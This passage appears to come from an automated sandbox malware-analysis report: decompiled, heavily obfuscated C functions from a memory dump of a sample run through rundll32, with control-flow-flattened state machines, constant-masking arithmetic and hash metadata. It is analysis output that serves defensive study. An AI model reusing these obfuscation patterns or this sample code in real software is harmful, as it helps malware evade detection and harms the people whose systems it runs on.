                                                                                                                                  				void* _t216;
                                                                                                                                  				void* _t218;
                                                                                                                                  
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t137);
                                                                                                                                  				_v136 = 0x2c5bc;
                                                                                                                                  				_t216 = _t215 + 0xc;
                                                                                                                                  				_t208 = 0;
                                                                                                                                  				_t173 = 0xf62a13b;
                                                                                                                                  				_t209 = 0x63;
                                                                                                                                  				_v136 = _v136 / _t209;
                                                                                                                                  				_v136 = _v136 + 0xe356;
                                                                                                                                  				_v136 = _v136 ^ 0x000982ba;
                                                                                                                                  				_v156 = 0x35028b;
                                                                                                                                  				_v156 = _v156 | 0x143a760d;
                                                                                                                                  				_v156 = _v156 + 0xfffff236;
                                                                                                                                  				_v156 = _v156 ^ 0x8a3e1055;
                                                                                                                                  				_v156 = _v156 ^ 0x9e033c32;
                                                                                                                                  				_v128 = 0xf43d73;
                                                                                                                                  				_v128 = _v128 | 0xd1983256;
                                                                                                                                  				_v128 = _v128 ^ 0xd1f71de4;
                                                                                                                                  				_v120 = 0x9951cf;
                                                                                                                                  				_v120 = _v120 + 0xffffd11b;
                                                                                                                                  				_v120 = _v120 ^ 0x00948e71;
                                                                                                                                  				_v152 = 0x57fc5b;
                                                                                                                                  				_v152 = _v152 | 0x88a856bb;
                                                                                                                                  				_v152 = _v152 << 9;
                                                                                                                                  				_v152 = _v152 + 0xa27f;
                                                                                                                                  				_v152 = _v152 ^ 0xfff91174;
                                                                                                                                  				_v116 = 0x3d6e6b;
                                                                                                                                  				_t210 = 9;
                                                                                                                                  				_v116 = _v116 / _t210;
                                                                                                                                  				_v116 = _v116 ^ 0x0006b75d;
                                                                                                                                  				_v140 = 0x916f20;
                                                                                                                                  				_t211 = 0x35;
                                                                                                                                  				_v140 = _v140 * 0x22;
                                                                                                                                  				_v140 = _v140 / _t211;
                                                                                                                                  				_t212 = 0x7b;
                                                                                                                                  				_v140 = _v140 * 0x1d;
                                                                                                                                  				_v140 = _v140 ^ 0x0a9423e2;
                                                                                                                                  				_v148 = 0x96f30f;
                                                                                                                                  				_v148 = _v148 ^ 0x6547be83;
                                                                                                                                  				_v148 = _v148 << 9;
                                                                                                                                  				_v148 = _v148 | 0xa101889a;
                                                                                                                                  				_v148 = _v148 ^ 0xa391ec3d;
                                                                                                                                  				_v124 = 0x9e8998;
                                                                                                                                  				_v124 = _v124 | 0x73c531f9;
                                                                                                                                  				_v124 = _v124 ^ 0x73d6e9c9;
                                                                                                                                  				_v132 = 0xda1f74;
                                                                                                                                  				_v132 = _v132 + 0x97a0;
                                                                                                                                  				_v132 = _v132 ^ 0xdacfb227;
                                                                                                                                  				_v132 = _v132 ^ 0xda161b2e;
                                                                                                                                  				_v144 = 0x87027b;
                                                                                                                                  				_t213 = _v128;
                                                                                                                                  				_v144 = _v144 / _t212;
                                                                                                                                  				_v144 = _v144 + 0x3568;
                                                                                                                                  				_v144 = _v144 | 0x38a39b99;
                                                                                                                                  				_v144 = _v144 ^ 0x38a88a96;
                                                                                                                                  				while(1) {
                                                                                                                                  					_t218 = _t173 - 0x628c872;
                                                                                                                                  					if(_t218 > 0) {
                                                                                                                                  						goto L25;
                                                                                                                                  					}
                                                                                                                                  					L2:
                                                                                                                                  					if(_t218 == 0) {
                                                                                                                                  						_push(_t173);
                                                                                                                                  						_push(_t173);
                                                                                                                                  						_t203 = 0x50;
                                                                                                                                  						_t213 = E002D7FF2(_t203);
                                                                                                                                  						__eflags = _t213;
                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                  							L16:
                                                                                                                                  							_t173 = 0xe7b6043;
                                                                                                                                  							continue;
                                                                                                                                  							do {
                                                                                                                                  								while(1) {
                                                                                                                                  									_t218 = _t173 - 0x628c872;
                                                                                                                                  									if(_t218 > 0) {
                                                                                                                                  										goto L25;
                                                                                                                                  									}
                                                                                                                                  									goto L2;
                                                                                                                                  								}
                                                                                                                                  								goto L25;
                                                                                                                                  								L45:
                                                                                                                                  								__eflags = _t173 - 0xee0c843;
                                                                                                                                  							} while (__eflags != 0);
                                                                                                                                  							L46:
                                                                                                                                  							return _t208;
                                                                                                                                  						}
                                                                                                                                  						_t173 = 0xf1dea2;
                                                                                                                                  						 *((intOrPtr*)(_t213 + 0x24)) = _v92;
                                                                                                                                  						 *((intOrPtr*)(_t213 + 0x3c)) = _v80;
                                                                                                                                  						 *((intOrPtr*)(_t213 + 0x20)) = _v72;
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					if(_t173 == 0xf1dea2) {
                                                                                                                                  						__eflags = _v84 - 1;
                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                  							E002E4B87( &_v108);
                                                                                                                                  							L13:
                                                                                                                                  							_t173 = 0x4d68783;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						_t173 = 0x9ca47b0;
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					if(_t173 == 0x1c23c86) {
                                                                                                                                  						__eflags = _v84 - 4;
                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                  							E002E6DF8( &_v108);
                                                                                                                                  							goto L13;
                                                                                                                                  						}
                                                                                                                                  						_t173 = 0x6a06f56;
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					if(_t173 == 0x45d7e1c) {
                                                                                                                                  						_t157 = E002ED97D( &_v40, _v120, __eflags, _v152,  &_v48, _v116);
                                                                                                                                  						_t216 = _t216 + 0xc;
                                                                                                                                  						__eflags = _t157;
                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                  							goto L46;
                                                                                                                                  						}
                                                                                                                                  						goto L16;
                                                                                                                                  					}
                                                                                                                                  					if(_t173 == 0x483085d) {
                                                                                                                                  						__eflags = _v84 - 7;
                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                  							E002E0E53( &_v108);
                                                                                                                                  						}
                                                                                                                                  						goto L13;
                                                                                                                                  					}
                                                                                                                                  					if(_t173 == 0x4d68783) {
                                                                                                                                  						_t191 =  *0x2f3208; // 0x0
                                                                                                                                  						_t208 = _t208 + 1;
                                                                                                                                  						 *_t213 =  *((intOrPtr*)(_t191 + 0x20c));
                                                                                                                                  						 *((intOrPtr*)(_t191 + 0x20c)) = _t213;
                                                                                                                                  						L10:
                                                                                                                                  						_t173 = 0x45d7e1c;
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					if(_t173 != 0x4fb7fc6) {
                                                                                                                                  						goto L45;
                                                                                                                                  					}
                                                                                                                                  					E002E0B19(0);
                                                                                                                                  					goto L10;
                                                                                                                                  					L25:
                                                                                                                                  					__eflags = _t173 - 0x6a06f56;
                                                                                                                                  					if(_t173 == 0x6a06f56) {
                                                                                                                                  						__eflags = _v84 - 5;
                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                  							E002DB74D( &_v108, _t213);
                                                                                                                                  							_t173 = 0x4d68783;
                                                                                                                                  							goto L45;
                                                                                                                                  						}
                                                                                                                                  						_t173 = 0xcf2e7b4;
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					__eflags = _t173 - 0x9a20357;
                                                                                                                                  					if(_t173 == 0x9a20357) {
                                                                                                                                  						__eflags = _v84 - 3;
                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                  							E002E1889( &_v108);
                                                                                                                                  							goto L13;
                                                                                                                                  						}
                                                                                                                                  						_t173 = 0x1c23c86;
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					__eflags = _t173 - 0x9ca47b0;
                                                                                                                                  					if(_t173 == 0x9ca47b0) {
                                                                                                                                  						__eflags = _v84 - 2;
                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                  							E002D9714( &_v108, _t213);
                                                                                                                                  							goto L13;
                                                                                                                                  						}
                                                                                                                                  						_t173 = 0x9a20357;
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					__eflags = _t173 - 0xcf2e7b4;
                                                                                                                                  					if(_t173 == 0xcf2e7b4) {
                                                                                                                                  						__eflags = _v84 - 6;
                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                  							E002DF09B( &_v108);
                                                                                                                                  							goto L13;
                                                                                                                                  						}
                                                                                                                                  						_t173 = 0x483085d;
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					__eflags = _t173 - 0xe7b6043;
                                                                                                                                  					if(_t173 == 0xe7b6043) {
                                                                                                                                  						_t166 = E002DE5CF( &_v48, _v140,  &_v112, _v148);
                                                                                                                                  						asm("sbb ecx, ecx");
                                                                                                                                  						_t173 = ( ~_t166 & 0x01cb4a56) + 0x45d7e1c;
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					__eflags = _t173 - 0xf62a13b;
                                                                                                                                  					if(_t173 != 0xf62a13b) {
                                                                                                                                  						goto L45;
                                                                                                                                  					}
                                                                                                                                  					E002D3DBC( &_v40, _a4, _v136, _v156, _v128);
                                                                                                                                  					_t216 = _t216 + 0xc;
                                                                                                                                  					_t173 = 0x4fb7fc6;
                                                                                                                                  				}
                                                                                                                                  			}


                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: V$h5$kn=
                                                                                                                                  • API String ID: 0-2568719763
                                                                                                                                  • Opcode ID: 882e6d1118a4764eb56cb089f1e584ceac3c54ba36e90b19855eece032f3595c
                                                                                                                                  • Instruction ID: 51265680cbd3d5261c1ecf11df4ea101734d11d292be312cd4d2b0b86affe235
                                                                                                                                  • Opcode Fuzzy Hash: 882e6d1118a4764eb56cb089f1e584ceac3c54ba36e90b19855eece032f3595c
                                                                                                                                  • Instruction Fuzzy Hash: 70A19970128341CBC72ACF26D4A552FBBE0EB84308F55892EF19686261D775DE29CF82
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                  			E002E4116() {
                                                                                                                                  				char _v524;
                                                                                                                                  				intOrPtr _v548;
                                                                                                                                  				char _v564;
                                                                                                                                  				intOrPtr _v568;
                                                                                                                                  				char _v572;
                                                                                                                                  				signed int _v576;
                                                                                                                                  				signed int _v580;
                                                                                                                                  				signed int _v584;
                                                                                                                                  				signed int _v588;
                                                                                                                                  				signed int _v592;
                                                                                                                                  				signed int _v596;
                                                                                                                                  				signed int _v600;
                                                                                                                                  				signed int _v604;
                                                                                                                                  				signed int _v608;
                                                                                                                                  				signed int _v612;
                                                                                                                                  				signed int _v616;
                                                                                                                                  				signed int _v620;
                                                                                                                                  				signed int _v624;
                                                                                                                                  				signed int _v628;
                                                                                                                                  				signed int _v632;
                                                                                                                                  				signed int _v636;
                                                                                                                                  				signed int _v640;
                                                                                                                                  				signed int _v644;
                                                                                                                                  				signed int _v648;
                                                                                                                                  				signed int _v652;
                                                                                                                                  				signed int _v656;
                                                                                                                                  				signed int _t220;
                                                                                                                                  				signed int _t222;
                                                                                                                                  				void* _t224;
                                                                                                                                  				void* _t226;
                                                                                                                                  				void* _t227;
                                                                                                                                  				signed int _t229;
                                                                                                                                  				signed int _t230;
                                                                                                                                  				signed int _t231;
                                                                                                                                  				signed int _t232;
                                                                                                                                  				signed int _t233;
                                                                                                                                  				signed int _t250;
                                                                                                                                  				void* _t253;
                                                                                                                                  				void* _t258;
                                                                                                                                  				void* _t260;
                                                                                                                                  
                                                                                                                                  				_v604 = 0x9b146b;
                                                                                                                                  				_v604 = _v604 | 0x658b3ccc;
                                                                                                                                  				_v604 = _v604 + 0xfffff1f3;
                                                                                                                                  				_v604 = _v604 ^ 0x659b2e62;
                                                                                                                                  				_v596 = 0xb07d39;
                                                                                                                                  				_v596 = _v596 | 0x89b98cff;
                                                                                                                                  				_v596 = _v596 ^ 0x89b9fdfe;
                                                                                                                                  				_v584 = 0x342693;
                                                                                                                                  				_v584 = _v584 ^ 0x5537c6ac;
                                                                                                                                  				_v584 = _v584 ^ 0x5503e03c;
                                                                                                                                  				_v628 = 0x844a73;
                                                                                                                                  				_v628 = _v628 | 0x8aea995b;
                                                                                                                                  				_v628 = _v628 >> 3;
                                                                                                                                  				_v628 = _v628 ^ 0x3316179a;
                                                                                                                                  				_v628 = _v628 ^ 0x224eeca0;
                                                                                                                                  				_v644 = 0xac1c02;
                                                                                                                                  				_v644 = _v644 * 0x6d;
                                                                                                                                  				_t227 = 0;
                                                                                                                                  				_v644 = _v644 << 0xf;
                                                                                                                                  				_t253 = 0x9728f62;
                                                                                                                                  				_t229 = 0x52;
                                                                                                                                  				_v644 = _v644 * 0x23;
                                                                                                                                  				_v644 = _v644 ^ 0xb0e78180;
                                                                                                                                  				_v636 = 0x949b2b;
                                                                                                                                  				_v636 = _v636 / _t229;
                                                                                                                                  				_v636 = _v636 << 4;
                                                                                                                                  				_t230 = 0x48;
                                                                                                                                  				_v636 = _v636 / _t230;
                                                                                                                                  				_v636 = _v636 ^ 0x000805f9;
                                                                                                                                  				_v652 = 0x50f951;
                                                                                                                                  				_v652 = _v652 << 0xe;
                                                                                                                                  				_v652 = _v652 + 0xffff7357;
                                                                                                                                  				_v652 = _v652 >> 5;
                                                                                                                                  				_v652 = _v652 ^ 0x01f330c3;
                                                                                                                                  				_v624 = 0xa7ee55;
                                                                                                                                  				_v624 = _v624 + 0x328f;
                                                                                                                                  				_t231 = 0x36;
                                                                                                                                  				_v624 = _v624 / _t231;
                                                                                                                                  				_v624 = _v624 + 0x3260;
                                                                                                                                  				_v624 = _v624 ^ 0x000caec1;
                                                                                                                                  				_v632 = 0x45b476;
                                                                                                                                  				_v632 = _v632 << 0xf;
                                                                                                                                  				_v632 = _v632 + 0x3fe9;
                                                                                                                                  				_v632 = _v632 + 0xffffc242;
                                                                                                                                  				_v632 = _v632 ^ 0xda30ae70;
                                                                                                                                  				_v576 = 0xb3f46f;
                                                                                                                                  				_v576 = _v576 >> 0xe;
                                                                                                                                  				_v576 = _v576 ^ 0x000becca;
                                                                                                                                  				_v640 = 0x899e10;
                                                                                                                                  				_v640 = _v640 << 3;
                                                                                                                                  				_v640 = _v640 | 0x15c6522a;
                                                                                                                                  				_v640 = _v640 >> 0xc;
                                                                                                                                  				_v640 = _v640 ^ 0x00018fe0;
                                                                                                                                  				_v648 = 0x6b2405;
                                                                                                                                  				_v648 = _v648 | 0xec8a856c;
                                                                                                                                  				_v648 = _v648 + 0xffffe7b2;
                                                                                                                                  				_v648 = _v648 >> 0xd;
                                                                                                                                  				_v648 = _v648 ^ 0x000a0717;
                                                                                                                                  				_v608 = 0xd62f5d;
                                                                                                                                  				_v608 = _v608 + 0xffffa804;
                                                                                                                                  				_v608 = _v608 >> 1;
                                                                                                                                  				_v608 = _v608 ^ 0x00686b18;
                                                                                                                                  				_v580 = 0x2fce72;
                                                                                                                                  				_t232 = 6;
                                                                                                                                  				_v580 = _v580 / _t232;
                                                                                                                                  				_v580 = _v580 ^ 0x000627ef;
                                                                                                                                  				_v612 = 0xa7d19a;
                                                                                                                                  				_v612 = _v612 ^ 0x125f9685;
                                                                                                                                  				_v612 = _v612 ^ 0x35fdcbd7;
                                                                                                                                  				_v612 = _v612 ^ 0x270c67d8;
                                                                                                                                  				_v656 = 0x784491;
                                                                                                                                  				_v656 = _v656 >> 9;
                                                                                                                                  				_v656 = _v656 | 0xfbff7fff;
                                                                                                                                  				_v656 = _v656 ^ 0xfbf9abc9;
                                                                                                                                  				_v616 = 0xc21bdd;
                                                                                                                                  				_t233 = 0x58;
                                                                                                                                  				_v616 = _v616 / _t233;
                                                                                                                                  				_v616 = _v616 | 0xde7eb344;
                                                                                                                                  				_v616 = _v616 ^ 0xde714edb;
                                                                                                                                  				_v620 = 0x22ba29;
                                                                                                                                  				_v620 = _v620 + 0xc334;
                                                                                                                                  				_v620 = _v620 ^ 0x41b5236d;
                                                                                                                                  				_v620 = _v620 ^ 0x4193ad78;
                                                                                                                                  				_v588 = 0x61092c;
                                                                                                                                  				_v588 = _v588 | 0xfbe761ce;
                                                                                                                                  				_v588 = _v588 ^ 0xfbe7142a;
                                                                                                                                  				_v600 = 0xd9609d;
                                                                                                                                  				_v600 = _v600 | 0x95d54fcb;
                                                                                                                                  				_v600 = _v600 ^ 0x95d705b7;
                                                                                                                                  				_v592 = 0xc80f6b;
                                                                                                                                  				_t234 = 0x42;
                                                                                                                                  				_t252 = _v600;
                                                                                                                                  				_v592 = _v592 / _t234;
                                                                                                                                  				_v592 = _v592 ^ 0x0000156e;
                                                                                                                                  				do {
                                                                                                                                  					while(_t253 != 0x25f6a69) {
                                                                                                                                  						if(_t253 == 0x9728f62) {
                                                                                                                                  							_t253 = 0xea70970;
                                                                                                                                  							continue;
                                                                                                                                  						} else {
                                                                                                                                  							if(_t253 == 0x9c0fe90) {
                                                                                                                                  								_t250 = _v632;
                                                                                                                                  								_t220 = E002D8F65(_v624, _t250,  &_v524, _v576, _t227, _v624, _v604, _v640, _v584, _v648, _v624, _v596);
                                                                                                                                  								_t252 = _t220;
                                                                                                                                  								_t260 = _t260 + 0x28;
                                                                                                                                  								__eflags = _t220 - 0xffffffff;
                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                  									_t253 = 0xaccbeb9;
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								if(_t253 == 0xaccbeb9) {
                                                                                                                                  									_t222 = E002D9350( &_v564, _t252, _v608, _v580, _t234, _v612);
                                                                                                                                  									asm("sbb esi, esi");
                                                                                                                                  									_t250 = _v616;
                                                                                                                                  									_t253 = ( ~_t222 & 0x010509a4) + 0x15a60c5;
                                                                                                                                  									_t234 = _v656;
                                                                                                                                  									E002E1E67(_v656, _t250, _v620, _v588, _t252);
                                                                                                                                  									_t260 = _t260 + 0x20;
                                                                                                                                  									goto L14;
                                                                                                                                  								} else {
                                                                                                                                  									if(_t253 == 0xdba0984) {
                                                                                                                                  										_t224 = E002EABD1();
                                                                                                                                  										_t258 = _v572 - _v548;
                                                                                                                                  										asm("sbb ecx, [esp+0x84]");
                                                                                                                                  										__eflags = _v568 - _t250;
                                                                                                                                  										if(__eflags >= 0) {
                                                                                                                                  											if(__eflags > 0) {
                                                                                                                                  												L19:
                                                                                                                                  												_t227 = 1;
                                                                                                                                  												__eflags = 1;
                                                                                                                                  											} else {
                                                                                                                                  												__eflags = _t258 - _t224;
                                                                                                                                  												if(_t258 >= _t224) {
                                                                                                                                  													goto L19;
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									} else {
                                                                                                                                  										_t268 = _t253 - 0xea70970;
                                                                                                                                  										if(_t253 != 0xea70970) {
                                                                                                                                  											goto L14;
                                                                                                                                  										} else {
                                                                                                                                  											_t250 = _v644;
                                                                                                                                  											_t234 = _v628;
                                                                                                                                  											_t226 = E002EDA22(_v628, _t250, _t268, _v636,  &_v524, _v628, _v652);
                                                                                                                                  											_t260 = _t260 + 0x10;
                                                                                                                                  											if(_t226 != 0) {
                                                                                                                                  												_t253 = 0x9c0fe90;
                                                                                                                                  												continue;
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L20:
                                                                                                                                  						return _t227;
                                                                                                                                  					}
                                                                                                                                  					E002EC1EC(_v600, _v592,  &_v572);
                                                                                                                                  					_pop(_t234);
                                                                                                                                  					_t253 = 0xdba0984;
                                                                                                                                  					L14:
                                                                                                                                  					__eflags = _t253 - 0x15a60c5;
                                                                                                                                  				} while (__eflags != 0);
                                                                                                                                  				goto L20;
                                                                                                                                  			}


                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,a$`2$?
                                                                                                                                  • API String ID: 0-2087061617
                                                                                                                                  • Opcode ID: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
                                                                                                                                  • Instruction ID: d70f504ff7292196f469b1cc5a156d7c03a424df455d6df42324530058d4b746
                                                                                                                                  • Opcode Fuzzy Hash: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
                                                                                                                                  • Instruction Fuzzy Hash: 26A121725583819FC368DF66C88A40BFBF1BBC5708F408A1DF59A96260D3B58A198F46
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                  			E002F13AD(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                  				void* _t197;
                                                                                                                                  				signed int _t222;
                                                                                                                                  				signed int _t226;
                                                                                                                                  				void* _t236;
                                                                                                                                  				void* _t245;
                                                                                                                                  				void* _t246;
                                                                                                                                  
                                                                                                                                  				_t245 = _t246 - 0x6c;
                                                                                                                                  				_push( *((intOrPtr*)(_t245 + 0x7c)));
                                                                                                                                  				_push( *((intOrPtr*)(_t245 + 0x78)));
                                                                                                                                  				_push( *((intOrPtr*)(_t245 + 0x74)));
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t197);
                                                                                                                                  				 *(_t245 + 0x10) =  *(_t245 + 0x10) & 0x00000000;
                                                                                                                                  				 *(_t245 + 0x14) =  *(_t245 + 0x14) & 0x00000000;
                                                                                                                                  				 *((intOrPtr*)(_t245 + 8)) = 0x9cee1d;
                                                                                                                                  				 *((intOrPtr*)(_t245 + 0xc)) = 0x3f83c9;
                                                                                                                                  				 *(_t245 + 0x38) = 0xf8747;
                                                                                                                                  				 *(_t245 + 0x38) =  *(_t245 + 0x38) | 0x414cebc6;
                                                                                                                                  				 *(_t245 + 0x38) =  *(_t245 + 0x38) << 1;
                                                                                                                                  				 *(_t245 + 0x38) =  *(_t245 + 0x38) ^ 0x829fdf8f;
                                                                                                                                  				 *(_t245 + 0x4c) = 0x1e90b9;
                                                                                                                                  				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x5b;
                                                                                                                                  				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x75;
                                                                                                                                  				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x4c;
                                                                                                                                  				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) ^ 0x63bb7720;
                                                                                                                                  				 *(_t245 + 0x54) = 0x94d35;
                                                                                                                                  				 *(_t245 + 0x54) =  *(_t245 + 0x54) | 0xafff8ff7;
                                                                                                                                  				 *(_t245 + 0x54) =  *(_t245 + 0x54) ^ 0xafffc7f7;
                                                                                                                                  				 *(_t245 + 0x40) = 0x2ce8ae;
                                                                                                                                  				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 0xe;
                                                                                                                                  				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 2;
                                                                                                                                  				 *(_t245 + 0x40) =  *(_t245 + 0x40) ^ 0xe8aa4789;
                                                                                                                                  				 *(_t245 + 0x58) = 0x43e6f3;
                                                                                                                                  				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff66dc;
                                                                                                                                  				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff2d2d;
                                                                                                                                  				 *(_t245 + 0x58) =  *(_t245 + 0x58) << 3;
                                                                                                                                  				 *(_t245 + 0x58) =  *(_t245 + 0x58) ^ 0x021485d0;
                                                                                                                                  				 *(_t245 + 0x24) = 0x72d00d;
                                                                                                                                  				 *(_t245 + 0x24) =  *(_t245 + 0x24) + 0xff2c;
                                                                                                                                  				 *(_t245 + 0x24) =  *(_t245 + 0x24) ^ 0x0076519a;
                                                                                                                                  				 *(_t245 + 0x34) = 0x43d743;
                                                                                                                                  				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff7104;
                                                                                                                                  				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff9485;
                                                                                                                                  				 *(_t245 + 0x34) =  *(_t245 + 0x34) ^ 0x004ddf56;
                                                                                                                                  				 *(_t245 + 0x2c) = 0xa6821;
                                                                                                                                  				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) + 0xffff1b8c;
                                                                                                                                  				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) ^ 0x00054b1d;
                                                                                                                                  				 *(_t245 + 0x60) = 0x210575;
                                                                                                                                  				 *(_t245 + 0x60) =  *(_t245 + 0x60) + 0xffff47c1;
                                                                                                                                  				 *(_t245 + 0x60) =  *(_t245 + 0x60) << 0xd;
                                                                                                                                  				 *(_t245 + 0x60) =  *(_t245 + 0x60) | 0x53e227ba;
                                                                                                                                  				 *(_t245 + 0x60) =  *(_t245 + 0x60) ^ 0x5bea66b9;
                                                                                                                                  				 *(_t245 + 0x44) = 0xde4c18;
                                                                                                                                  				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x2ab2982c;
                                                                                                                                  				 *(_t245 + 0x44) =  *(_t245 + 0x44) | 0x439a512a;
                                                                                                                                  				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x6bf18420;
                                                                                                                                  				 *(_t245 + 0x50) = 0xde2575;
                                                                                                                                  				 *(_t245 + 0x50) =  *(_t245 + 0x50) >> 0xa;
                                                                                                                                  				 *(_t245 + 0x50) =  *(_t245 + 0x50) << 0xe;
                                                                                                                                  				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xce6820f5;
                                                                                                                                  				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xc3874735;
                                                                                                                                  				 *(_t245 + 0x18) = 0x52bd7f;
                                                                                                                                  				 *(_t245 + 0x18) =  *(_t245 + 0x18) ^ 0x005e950b;
                                                                                                                                  				 *(_t245 + 0x3c) = 0xe72c64;
                                                                                                                                  				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) * 0x71;
                                                                                                                                  				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) | 0xa2bf1516;
                                                                                                                                  				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) ^ 0xe6bf08bc;
                                                                                                                                  				 *(_t245 + 0x48) = 0x12926a;
                                                                                                                                  				 *(_t245 + 0x48) =  *(_t245 + 0x48) | 0xd69b5974;
                                                                                                                                  				 *(_t245 + 0x48) =  *(_t245 + 0x48) << 0xc;
                                                                                                                                  				 *(_t245 + 0x48) =  *(_t245 + 0x48) ^ 0xbdb2bc40;
                                                                                                                                  				 *(_t245 + 0x5c) = 0xf2f3b3;
                                                                                                                                  				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) << 3;
                                                                                                                                  				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0xffff4add;
                                                                                                                                  				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0x5b51;
                                                                                                                                  				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) ^ 0x0796f200;
                                                                                                                                  				 *(_t245 + 0x64) = 0x250dfe;
                                                                                                                                  				 *(_t245 + 0x64) =  *(_t245 + 0x64) << 7;
                                                                                                                                  				 *(_t245 + 0x64) =  *(_t245 + 0x64) | 0xde1ed6e5;
                                                                                                                                  				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0xc3c6abe4;
                                                                                                                                  				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0x1d594f44;
                                                                                                                                  				 *(_t245 + 0x68) = 0x1b0053;
                                                                                                                                  				_t226 = 0x44;
                                                                                                                                  				 *(_t245 + 0x68) =  *(_t245 + 0x68) * 0x1d;
                                                                                                                                  				 *(_t245 + 0x68) =  *(_t245 + 0x68) >> 0xa;
                                                                                                                                  				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa237b60d;
                                                                                                                                  				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa23e8db7;
                                                                                                                                  				 *(_t245 + 0x30) = 0x848c63;
                                                                                                                                  				_t142 = _t245 - 0x18; // 0x12da7d1b
                                                                                                                                  				 *(_t245 + 0x30) =  *(_t245 + 0x30) / _t226;
                                                                                                                                  				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x3584b77a;
                                                                                                                                  				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x35842ad7;
                                                                                                                                  				 *(_t245 + 0x28) = 0x69c662;
                                                                                                                                  				 *(_t245 + 0x28) =  *(_t245 + 0x28) * 0x1f;
                                                                                                                                  				 *(_t245 + 0x28) =  *(_t245 + 0x28) ^ 0x0ccd1c29;
                                                                                                                                  				 *(_t245 + 0x20) = 0x70b48b;
                                                                                                                                  				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xdd83dbf0;
